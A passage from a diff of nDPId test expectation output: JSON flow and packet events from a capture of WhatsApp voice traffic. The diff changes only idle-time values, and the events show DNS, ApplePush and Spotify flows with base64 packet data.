{"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": 
{"query":"g.whatsapp.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"157.240.20.53"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688201,"flow_last_seen":1561455688201,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1561455688201,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1561455688201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1561455688201,"pkt":"xiwDYGpkkLkxKPrKCABFAgXUAABAAEAGJCjAqAIMEfI8VMDKFGdIDyQZ7pIeMIAQCAC0bwAAAQEICjTN8KY8skLCFwMDD+Ai5NOSopi\/6GqwlD\/tAZzY1QGzvljqTGTmGCJOrU3x8CYKomrYaziO5eZ4ouY8cCYpOJvKrDNJX33pdge2bBxjgZp3ciHlbT9gHcPpJV3HIK5K4Xwsy7N\/d9l3pDdGz5PHrVVzZeXakf14DKR+hXrIhRVy6hpv5t2VthQzM3sKU7KhJpL\/6a5Sp489WK3Z7dzYFK2J+ermhE1b03GDPIEb7MGTpTJQaqangZgy8gro1eaetAilk1o529zodA1M9O5BVqL2oF301LG+kaqQTY1SPLvOnn1MxBlBEbzmsfvPr0H7C5Xcv51kP+cMU9R39VU1KEVp3e+2GMmIXWxgb+NKRMo4d5o6BKoHJ36YKQ33eAmIMAcZsFkdzfDz5q2jCxngiuQsbQKoYL1rQHGV7CXWI3zE9edQrQPJaGQZaxu\/+b+1vqSWxtCMEOUMVSmhM+FpUOqnKqwXsN4BgvySE1+U34RH0SV6FPoBjF0WGfVjkUid\/lVZcbedi\/PfkG0yBpT2\/Is9EIUqT+5Azj96UOFZqIEtSsIYSrk7ySkvjrKz5bHkeMLQk1mxQwJByZOSa30oY5bmNGAgD00g7CKAigVgWl6pq33BURhk4PDRhLJn426pN8ndnOOPzVylhr5g1C978hT8qaiuW1hlXdPnoMeCp9hEy7A5ziIjQi\/j6SVmDBSjwtJ0oqoQ\/ul2VzP1hHUGnZiTl\/qoxKKUfFrrwqTto6BvQjrKNa8bmHfrJg1RkCF3YK1iU3RCTPB\/4c68wZU3wRZ8hH1dNOLSgk
wNQHFvEa\/gv\/qOxZkCS+Hpja9b5OtYooCqZnURTItdIoosw\/pte6KHG8eCIx\/U7yLLCmLs4D6MQwGZZ2yJ9zt9zcZXv1g03W4UohfquGy0ioHzSnw\/O3jNSfyTyrsrgxGqBD7B02ehphvU7Ax3IIziLDpWGnOBTyjYVNl423Z+0c9qK5fdUeybRNKKbWmwJqAFyKo3Mn2oSjBse+IbmEyy74UtCrn7MO79P00k7ZwAdz4X9zs28aMTKpnGFfXXxKMpT0Dd5ofiYXaTFr2Jwybi92XLCleA2OWxMIUro0rxoo67fYKdVxbqwQCMyEw6LTznHMXWYOpkkn6VHuawZe8M1HJsON5lEoItuqd\/IBfWUMshGlV8OgIAoc3EW3VlOFAiqg0pqVqjmyE8T8wQAvejRCf2f7iThtrzSrjIJDgibkW3Ecp3KoIC1KVlhjp4HLMvTgc12F13bDzcsr4rYSNpgOus\/4N4UzMrQyfYM2uNlqx0HfPLs50MVn\/Kyef0KdSuCHGqHLEJ+g1+EB9i2mop53wwymGotu9IoWgU02wrdRtoavOIQ5TMaPT9Jy+tmpyw9rSZn4YhMfxR72sCFIVM2eQlDOP2kti8y02qh8vwstuWp8ER3\/PKo9BgChhkuUmF5Df6lKXn1exWi67C9f1S5pc1iv33gDt3T0VcEHwoxmIh6MLrQ4LDUY7JX7mEuRfro3sR\/Ir2ufPPOhOBqsPV5YskVY9tWAevz7WMRn8EtRyvVaVHL3wxu1gErJNgcQ\/Af9fGR5KHI8lfrzLWY+bV9Q6PY8piE9FU2r7QV9Q5YgbBE6yKjPA3fOpiBOv+IVCsLXJNVdRvAywibpuoJAy2z01Fc5o3x+ZW2eqdFSSyuDepi7EBv4YJnAtmqjCVimRnoZ68Pz\/ocEFw5tBKkvU5uadJKwflJJ0hJUUOKwAQFCWvvApj3f356wTvDmU788W1R\/Vmzin60ZrsL16uD4sDmXGOueQVWddIzbIT0jyuT6IK9gJjCyELuMZhwwjNJ\/gEh8+\/PwFaVXbn\/1dsvjpj0IhPwCusRttL60194v983ySgSQpQrf9f+n\/rJIRYwpsq4DBRu9SydD72zD93mD4idl3s3tsUHh6rp5k7Bf4L"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688201,"flow_last_seen":1561455688201,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1561455688201,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 
-02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1561455688202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1561455688202,"pkt":"xiwDYGpkkLkxKPrKCABFAgXUAABAAEAGJCjAqAIMEfI8VMDKFGdIDym57pIeMIAQCADYpQAAAQEICjTN8KY8skLCFtVfgrozcBhAJsfsFvLQO\/UNbKaPAKskPEHc2H7HNZvZ0KHfZ\/KP+B9OyPm0SdMSjavTXp1RBX4n8dtnNy7ldwySyG0XJJWeRoZiiRtgXrZdFFD0QAS3Pe1DBo\/FUctyy9XBKqwrw5v92Jj5UtBctOxUvfejQ1SPTAJ5IukXOUTVRhF+GJ6uJpn2Gyv2J\/hXj4mZyNeIliL2I7bOA3ury1GpGWko+MWMnPSKdWfc+5iZ8htj49VB2VDsL+uaCsidGqZX708pkKajJgAtzAX6+OwUhPXab61vOJn2ZVsE84On3Sc1Kl0WWtXgaA5Kty9ym4wLqQYEYP55F5oeJX4cTBOZRUcxhyM2DEPfiJE4aGH7aPKJO1JXXtoaeR6aRsid5OY044cRXoCwjbqa8kVLoyG\/1hSUaMwK17Rm6Nq+PbrF+ED8fmHgN\/1Dutcz+R4xma\/dfBoQDryBVCTEwOthrl7LLjRmNDBA\/nKPrgUx1pUPyir\/k\/cBNu5VmA9ROEDXJTcYsaqkjSroNougihkTVcfxMwA0V1eozYWnylZYZfyg3u53u+M+Do2uu\/vpHb6ZX\/5fq7AfMO72tRX4kcflTeOHJPV42uX70ZwC1O+A2X8wG0wRrb8uK6OFhHts3S52N3FVIqWr3CBOEKtXus3msBLphIaEqtw7dKWimDDeKkgZyeDybQGBbwSqGgwXI4sXoyN6QNVYT2T4i6kGXwJ8KRo8HtR5yB7rhqGJ7va7Tq2PlcpSnVIQRwao1mofCncrFLbOpoxslAuFLv8G+fW1GEiueEIhAplFAErT8lEbc6sY9uI88S0O6mDpNBlvCBLanRfw12SWljEVA4Wh2w31ojL9SCLJgyYKb3rrXT3V5i0AGJxXutmEyz9yTXUcoSU1YUo3WfmVLfx6RyxgbfoU7yfB7G33wI6gfsYIkzsYXlIla2ZkFjlWmYTCmfyEh6mVsXCVMnp1BhZdWj+7bWgfM4VrhMG0uNxDM0Z53kq9r7jYLXP1URavTKVNjY1WxQ1RAuRJtVPSgtQELf6AAzGAMW947SHl7bPC94gub8Kmqytrgl8ICRtP21Twca8YlwoKzIkJ0ROGsHSJ1IUBnknB2X57XNTUY80EyrwKOEYdXqBbK5\/uwztG9gvPjPu8PKqPu7OCXZj1ZBnnEX2PjjdGe8\/qo\/GKpAlJAuol7xe33zGz401h7+ux36y894Mbarjx1CDQxx9YqwY6Lr4EHSyCq\/xOaCM9Ig4AmEcFYjNP6niCHmI6fO24v\/GQB6WXdzSw2ClyCXHYbvr4Qqi+4qXoeh2xXDeKjcBBfLtEOni++s2q3gzhbAvkZLj\/NmeA2TXw0Z3iDbzj8\/Y4RPkg+eKwZkIo3UDfKsFnJdpryN60+cHgLr\/4b6yqkGde7QP698bVNcwUBDmhcPTGUF72BSrLQvrtwQZtWbAZrNkztpBLnQ0QkqUG4rCER6dvRqYMKv5dFfseMTa1Q1gUuqPbbz23yUKTRtop\/\/Lh
t4EEFlQYsfbz48ddhpIGiMg5mZbcRDG3SabEXgtzSNVHYYfQC6vW4pikjByoIlKAdhA6SR3Oh3PU52UQkf1H00x5\/\/1hV8lcpLckyN2LNUVFAYrwz5do38QxPssBrJ+3S6\/aEGPegc3B67mnX5V9KdAWJTKT9mA6BOcYDIvqCcaofS9sLdAjWNazl\/6YRqmsk\/JZn6nsHta+t4co6kKrh8ZoenAhtwbNaOVmExbItteeviDeqFUd2pkhp3kXIT8d6YMdXIloWHR8vT7oGOwNL5sNWFZXjAeqyXFLohZVoKLbw4szdHzrmDOl0IHwY6y6lYvTSYc6OyNhkaHXFSCKUjvAFZPuWmliraxAT7phw5quixNUJhdRcYng0LMN9J3KAyHFA8Ber5WNyIqMxWZ5wh4eVaY0B\/wQ"} -02080{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1561455688202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1255,"pkt_l4_len":1221,"thread_ts_msec":1561455688202,"pkt":"xiwDYGpkkLkxKPrKCABFAgTZAABAAEAGJSPAqAIMEfI8VMDKFGdIDy9Z7pIeMIAYCACWYAAAAQEICjTN8KY8skLChD9+sl9zTIn+9oKwtdTi9Vdi\/cqtS9SsuLktLexhq+H6HSh0nUz\/pR7lGjfA8jUSbTLAiEYeFmvZtDgZTjhibXwhbTyW2ej1slX5wS0YUeKb381u+fexhn3xRkOOgFD2lHUCDNs6ZDxZ3MgjWXZ\/6y+5+G4Cr5MmO9LbbXgHM2tCoGf6bFpAilIbDNDjf72PZn2d6eJMciO25CCni3NwF1VQe25Bd9JCM8RNSipKwwpntSqY6SidwnIyNKgMjNfj+GMhuOpcSsAcRSjT\/L\/y6Nc7rkRDfvgoZpO7IrcZRsLerm0SSzH8usyI2xA+WCvEPlDoV\/87+olgpceCoKG1cf6TrD9aD7Lh7Yzi2mRYXX50kN9XYC9UhK+eEqcUiK0EA6ia38NkceSip2pBuv85\/091UH5OzSLrTUOJg+XVoE7ssGb7XKiRE+FOZu+zmhmuXn2Ujg8u76JsqT+uY0KkCyvwkXLeCV2kPGxz31MiSwGtNtz1oNvEGHur+FQDs\/zPpy1TfX803cqFKkblAu9BFTe4MXIK6IqhxFJcK3dj\/d8o2Zlvxu2S2NA3FH3zT7CWqacXhL+wQyS+\/DALOFfsZZCyD97Lwmcig1rgISji1T9qsBO4dRFWt5bVa2GoIozmHRLhPE\/xUBXrVvCjMLlRXbBby9l3tFLBkeNarajglfyHMtazotsPWceBe13wiPjaSciJqd486cT5nmripbb2TNv6m2QS+yBxolanBtMMlalvyClJnjFYXmEMA\/Cqafcjah0LpamWi5cGxlhK2o7VpcXk60WiDqklprDwU1C6AQQ3t9+In381BWOH2ylFLvtkYQS6mza73M7ORMV9T+VX4ja00u4BItehp2lgwr5wZ9hQu6lejNiwFYLaMPe7D\/bAwWtcZeYT8kAUL9H2S1idX7efThRI\/sFUnhFydcfZzFx9yoqvQ\/XNBIf8hR2ZwEmxUM7nHYq2mZ+\/B91bETK14kZx6AmSi1jqJABWenJppvp4cXzcY1BWUqJk0PLYkAexhw7t652If5IzcojeSdWFP2lhdau7nHX6G7lW4Utg7ZWXLyccWSWSv6ha+LeiD
lED1cCwY2vVHkPEKRqluaQYKLl2qvR1wE3m0usuIl4q2MEc3z7A5MGmXicgQHspwoVe96OedZ9UbKdxn5F5OBTgOA+JY4EBKs3\/51SigijtnbNr7w00IZM1a32DUVsHDNnCKoJQHhPhULTSuboR4FgTKv5jA8DkAaFXzOTQQMYjx7YZD+FVCVnmqRcXzRQCUejaACj05EFq7vsiXpx9kEWnOGLDfJ22A0AjBRXoBK9EYB2xjWa+gzWXLgtnfTfAdhzT3lkAyklF\/qQA0sttDRgDxUQ4slW4E3BzVFH0h4GehIXJZzWEseP9XQr0J1UhTOB7Dv78mCeQyIVzY5PpIKGqL37IUaJV6gk4viji4bM8JRt522Xsc3xIrKuiMjhRRmYQYZR2\/fsuI+jWL\/oLRyVbeQmMYbj2qIY8qMyxD0\/HUbbJCm1sWV3U2RsK1wnhcO2gFFVKyPqfKwE0xDwAtsxVH6ZCeakAFNP5dRNlfhay6WJ8owHDTw=="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688201,"flow_last_seen":1561455688201,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1561455688201,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1561455688201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1561455688201,"pkt":"xiwDYGpkkLkxKPrKCABFAgXUAABAAEAGJCjAqAIMEfI8VMDKFGdIDyQZ7pIeMIAQCAC0bwAAAQEICjTN8KY8skLCFwMDD+Ai5NOSopi\/6GqwlD\/tAZzY1QGzvljqTGTmGCJOrU3x8CYKomrYaziO5eZ4ouY8cCYpOJvKrDNJX33pdge2bBxjgZp3ciHlbT9gHcPpJV3HIK5K4Xwsy7N\/d9l3pDdGz5PHrVVzZeXakf14DKR+hXrIhRVy6hpv5t2VthQzM3sKU7KhJpL\/6a5Sp489WK3Z7dzYFK2J+ermhE1b03GDPIEb7MGTpTJQaqangZgy8gro1eaetAilk1o529zodA1M9O5BVqL2oF301LG+kaqQTY1SPLvOnn1MxBlBEbzmsfvPr0H7C5Xcv51kP+cMU9R39VU1KEVp3e+2GMmIXWxgb+NKRMo4d5o6BKoHJ36YKQ33eAmIMAcZsFkdzfDz5q2jCxngiuQsbQKoYL1rQHGV7CXWI3zE9edQrQPJaGQZaxu\/+b+1vqSWxtCMEOUMVSmhM+FpUOqnKqwXsN4BgvySE1+U34RH0SV6FPoBjF0WGfVjkUid\/lVZcbedi\/PfkG0yBpT2\/Is9EIUqT+5Azj96UOFZqIEtSsIYSrk7ySkvjrKz5bHkeMLQk1mxQwJByZOSa30oY5bmNGAgD00g7CKAigVgWl6pq33BURhk4PDRhLJn426pN8ndnOOPzVylhr5g1C978hT8qaiuW1hlXdPnoMeCp9hEy7A5ziIjQi\/j6SVmDBSjwtJ0oqoQ\/ul2VzP1hHUGnZiTl\/qoxKKUfFrrwqTto6BvQjrKNa8bmHfrJg1RkCF3YK1iU3RCTPB\/4c68wZU3wRZ8hH1dNOLSgkwNQHFvEa\/gv\/qOxZkCS+Hpja9b5OtYooCqZnURTItdIoosw\/pte6KHG8eCIx\/U7yLLCmLs4D6MQwGZZ2yJ9zt9zcZXv1g03W4UohfquGy0ioHzSnw\/O3jNSfyTyrsrgxGqBD7B02ehphvU7Ax3IIziLDpWGnOBTyjYVNl423Z+0c9qK5fdUeybRNKKbWmwJqAFyKo3Mn2oSjBse+IbmEyy74UtCrn7MO79P00k7ZwAdz4X9zs28aMTKpnGFfXXxKMpT0Dd5ofiYXaTFr2Jwybi92XLCleA2OWxMIUro0rxoo67fYKdVxbqwQCMyEw6LTznHMXWYOpkkn6VHuawZe8M1HJsON5lEoItuqd\/IBfWUMshGlV8OgIAoc3EW3VlOFAiqg0pqVqjmyE8T8wQAvejRCf2f7iThtrzSrjIJDgibkW3Ecp3KoIC1KVlhjp4HLMvTgc12F13bDzcsr4rYSNpgOus\/4N4UzMrQyfYM2uNlqx0HfPLs50MVn\/Kyef0KdSuCHGqHLEJ+g1+EB9i2mop53wwymGotu9IoWgU02wrdRtoavOIQ5TMaPT9Jy+tmpyw9rSZn4YhMfxR72sCFIVM2eQlDOP2kti8y02qh8vwstuWp8ER3\/PKo9BgChhkuUmF5Df6lKXn1exWi67C9f1S5pc1iv33gDt3T0VcEHwoxmIh6MLrQ4LDUY7JX7mEuRfro3sR\/Ir2
ufPPOhOBqsPV5YskVY9tWAevz7WMRn8EtRyvVaVHL3wxu1gErJNgcQ\/Af9fGR5KHI8lfrzLWY+bV9Q6PY8piE9FU2r7QV9Q5YgbBE6yKjPA3fOpiBOv+IVCsLXJNVdRvAywibpuoJAy2z01Fc5o3x+ZW2eqdFSSyuDepi7EBv4YJnAtmqjCVimRnoZ68Pz\/ocEFw5tBKkvU5uadJKwflJJ0hJUUOKwAQFCWvvApj3f356wTvDmU788W1R\/Vmzin60ZrsL16uD4sDmXGOueQVWddIzbIT0jyuT6IK9gJjCyELuMZhwwjNJ\/gEh8+\/PwFaVXbn\/1dsvjpj0IhPwCusRttL60194v983ySgSQpQrf9f+n\/rJIRYwpsq4DBRu9SydD72zD93mD4idl3s3tsUHh6rp5k7Bf4L"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688201,"flow_last_seen":1561455688201,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1561455688201,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 
+02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1561455688202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1561455688202,"pkt":"xiwDYGpkkLkxKPrKCABFAgXUAABAAEAGJCjAqAIMEfI8VMDKFGdIDym57pIeMIAQCADYpQAAAQEICjTN8KY8skLCFtVfgrozcBhAJsfsFvLQO\/UNbKaPAKskPEHc2H7HNZvZ0KHfZ\/KP+B9OyPm0SdMSjavTXp1RBX4n8dtnNy7ldwySyG0XJJWeRoZiiRtgXrZdFFD0QAS3Pe1DBo\/FUctyy9XBKqwrw5v92Jj5UtBctOxUvfejQ1SPTAJ5IukXOUTVRhF+GJ6uJpn2Gyv2J\/hXj4mZyNeIliL2I7bOA3ury1GpGWko+MWMnPSKdWfc+5iZ8htj49VB2VDsL+uaCsidGqZX708pkKajJgAtzAX6+OwUhPXab61vOJn2ZVsE84On3Sc1Kl0WWtXgaA5Kty9ym4wLqQYEYP55F5oeJX4cTBOZRUcxhyM2DEPfiJE4aGH7aPKJO1JXXtoaeR6aRsid5OY044cRXoCwjbqa8kVLoyG\/1hSUaMwK17Rm6Nq+PbrF+ED8fmHgN\/1Dutcz+R4xma\/dfBoQDryBVCTEwOthrl7LLjRmNDBA\/nKPrgUx1pUPyir\/k\/cBNu5VmA9ROEDXJTcYsaqkjSroNougihkTVcfxMwA0V1eozYWnylZYZfyg3u53u+M+Do2uu\/vpHb6ZX\/5fq7AfMO72tRX4kcflTeOHJPV42uX70ZwC1O+A2X8wG0wRrb8uK6OFhHts3S52N3FVIqWr3CBOEKtXus3msBLphIaEqtw7dKWimDDeKkgZyeDybQGBbwSqGgwXI4sXoyN6QNVYT2T4i6kGXwJ8KRo8HtR5yB7rhqGJ7va7Tq2PlcpSnVIQRwao1mofCncrFLbOpoxslAuFLv8G+fW1GEiueEIhAplFAErT8lEbc6sY9uI88S0O6mDpNBlvCBLanRfw12SWljEVA4Wh2w31ojL9SCLJgyYKb3rrXT3V5i0AGJxXutmEyz9yTXUcoSU1YUo3WfmVLfx6RyxgbfoU7yfB7G33wI6gfsYIkzsYXlIla2ZkFjlWmYTCmfyEh6mVsXCVMnp1BhZdWj+7bWgfM4VrhMG0uNxDM0Z53kq9r7jYLXP1URavTKVNjY1WxQ1RAuRJtVPSgtQELf6AAzGAMW947SHl7bPC94gub8Kmqytrgl8ICRtP21Twca8YlwoKzIkJ0ROGsHSJ1IUBnknB2X57XNTUY80EyrwKOEYdXqBbK5\/uwztG9gvPjPu8PKqPu7OCXZj1ZBnnEX2PjjdGe8\/qo\/GKpAlJAuol7xe33zGz401h7+ux36y894Mbarjx1CDQxx9YqwY6Lr4EHSyCq\/xOaCM9Ig4AmEcFYjNP6niCHmI6fO24v\/GQB6WXdzSw2ClyCXHYbvr4Qqi+4qXoeh2xXDeKjcBBfLtEOni++s2q3gzhbAvkZLj\/NmeA2TXw0Z3iDbzj8\/Y4RPkg+eKwZkIo3UDfKsFnJdpryN60+cHgLr\/4b6yqkGde7QP698bVNcwUBDmhcPTGUF72BSrLQvrtwQZtWbAZrNkztpBLnQ0QkqUG4rCER6dvRqYMKv5dFfseMTa1Q1gUuqPbbz23yUKTRtop\/\/Lh
t4EEFlQYsfbz48ddhpIGiMg5mZbcRDG3SabEXgtzSNVHYYfQC6vW4pikjByoIlKAdhA6SR3Oh3PU52UQkf1H00x5\/\/1hV8lcpLckyN2LNUVFAYrwz5do38QxPssBrJ+3S6\/aEGPegc3B67mnX5V9KdAWJTKT9mA6BOcYDIvqCcaofS9sLdAjWNazl\/6YRqmsk\/JZn6nsHta+t4co6kKrh8ZoenAhtwbNaOVmExbItteeviDeqFUd2pkhp3kXIT8d6YMdXIloWHR8vT7oGOwNL5sNWFZXjAeqyXFLohZVoKLbw4szdHzrmDOl0IHwY6y6lYvTSYc6OyNhkaHXFSCKUjvAFZPuWmliraxAT7phw5quixNUJhdRcYng0LMN9J3KAyHFA8Ber5WNyIqMxWZ5wh4eVaY0B\/wQ"} +02080{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1561455688202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1255,"pkt_l4_len":1221,"thread_ts_msec":1561455688202,"pkt":"xiwDYGpkkLkxKPrKCABFAgTZAABAAEAGJSPAqAIMEfI8VMDKFGdIDy9Z7pIeMIAYCACWYAAAAQEICjTN8KY8skLChD9+sl9zTIn+9oKwtdTi9Vdi\/cqtS9SsuLktLexhq+H6HSh0nUz\/pR7lGjfA8jUSbTLAiEYeFmvZtDgZTjhibXwhbTyW2ej1slX5wS0YUeKb381u+fexhn3xRkOOgFD2lHUCDNs6ZDxZ3MgjWXZ\/6y+5+G4Cr5MmO9LbbXgHM2tCoGf6bFpAilIbDNDjf72PZn2d6eJMciO25CCni3NwF1VQe25Bd9JCM8RNSipKwwpntSqY6SidwnIyNKgMjNfj+GMhuOpcSsAcRSjT\/L\/y6Nc7rkRDfvgoZpO7IrcZRsLerm0SSzH8usyI2xA+WCvEPlDoV\/87+olgpceCoKG1cf6TrD9aD7Lh7Yzi2mRYXX50kN9XYC9UhK+eEqcUiK0EA6ia38NkceSip2pBuv85\/091UH5OzSLrTUOJg+XVoE7ssGb7XKiRE+FOZu+zmhmuXn2Ujg8u76JsqT+uY0KkCyvwkXLeCV2kPGxz31MiSwGtNtz1oNvEGHur+FQDs\/zPpy1TfX803cqFKkblAu9BFTe4MXIK6IqhxFJcK3dj\/d8o2Zlvxu2S2NA3FH3zT7CWqacXhL+wQyS+\/DALOFfsZZCyD97Lwmcig1rgISji1T9qsBO4dRFWt5bVa2GoIozmHRLhPE\/xUBXrVvCjMLlRXbBby9l3tFLBkeNarajglfyHMtazotsPWceBe13wiPjaSciJqd486cT5nmripbb2TNv6m2QS+yBxolanBtMMlalvyClJnjFYXmEMA\/Cqafcjah0LpamWi5cGxlhK2o7VpcXk60WiDqklprDwU1C6AQQ3t9+In381BWOH2ylFLvtkYQS6mza73M7ORMV9T+VX4ja00u4BItehp2lgwr5wZ9hQu6lejNiwFYLaMPe7D\/bAwWtcZeYT8kAUL9H2S1idX7efThRI\/sFUnhFydcfZzFx9yoqvQ\/XNBIf8hR2ZwEmxUM7nHYq2mZ+\/B91bETK14kZx6AmSi1jqJABWenJppvp4cXzcY1BWUqJk0PLYkAexhw7t652If5IzcojeSdWFP2lhdau7nHX6G7lW4Utg7ZWXLyccWSWSv6ha+LeiD
lED1cCwY2vVHkPEKRqluaQYKLl2qvR1wE3m0usuIl4q2MEc3z7A5MGmXicgQHspwoVe96OedZ9UbKdxn5F5OBTgOA+JY4EBKs3\/51SigijtnbNr7w00IZM1a32DUVsHDNnCKoJQHhPhULTSuboR4FgTKv5jA8DkAaFXzOTQQMYjx7YZD+FVCVnmqRcXzRQCUejaACj05EFq7vsiXpx9kEWnOGLDfJ22A0AjBRXoBK9EYB2xjWa+gzWXLgtnfTfAdhzT3lkAyklF\/qQA0sttDRgDxUQ4slW4E3BzVFH0h4GehIXJZzWEseP9XQr0J1UhTOB7Dv78mCeQyIVzY5PpIKGqL37IUaJV6gk4viji4bM8JRt522Xsc3xIrKuiMjhRRmYQYZR2\/fsuI+jWL\/oLRyVbeQmMYbj2qIY8qMyxD0\/HUbbJCm1sWV3U2RsK1wnhcO2gFFVKyPqfKwE0xDwAtsxVH6ZCeakAFNP5dRNlfhay6WJ8owHDTw=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688445,"flow_last_seen":1561455688445,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455688445,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1561455688445,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455688445,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABI7iMAAEARBjHAqAIBwKgC\/+EV4RUANEtUU3BvdFVkcDC64ScQKi2g\/wABAARIlcIDyUSzc\/3fJAksKuG26pMF0apN5Ek="} 
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688445,"flow_last_seen":1561455688445,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455688445,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 